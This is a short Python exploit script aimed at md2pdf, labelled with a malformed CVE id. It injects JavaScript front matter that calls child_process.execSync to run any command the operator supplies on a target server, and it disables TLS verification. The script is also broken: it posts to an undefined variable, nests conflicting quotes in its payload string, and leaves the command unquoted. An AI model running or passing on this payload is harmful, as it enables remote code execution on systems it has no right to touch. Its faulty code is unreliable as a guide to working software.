import requests
import argparse

def exploit(target_url, command):

    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = f"---js\n((require("child_process")).execSync({command}))\n---RCE"

    # Send the malicious request to the vulnerable server
    response = requests.post(url, headers=headers, data=data, verify=False)

    if response.status_code == 200:
        print(f"[+] Exploit sent successfully! Check the server output.")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")


if __name__ == '__main__':
    # Example usage
    parser = argparse.ArgumentParser(description="Exploit CVE-2021-23639O - md2pdf")
    
    parser.add_argument('target', help="complete URL of the vulnerable website")
    parser.add_argument('cmd', help="Command to run on the vulnerable system")
    
    args = parser.parse_args()
    exploit(args.target, args.cmd)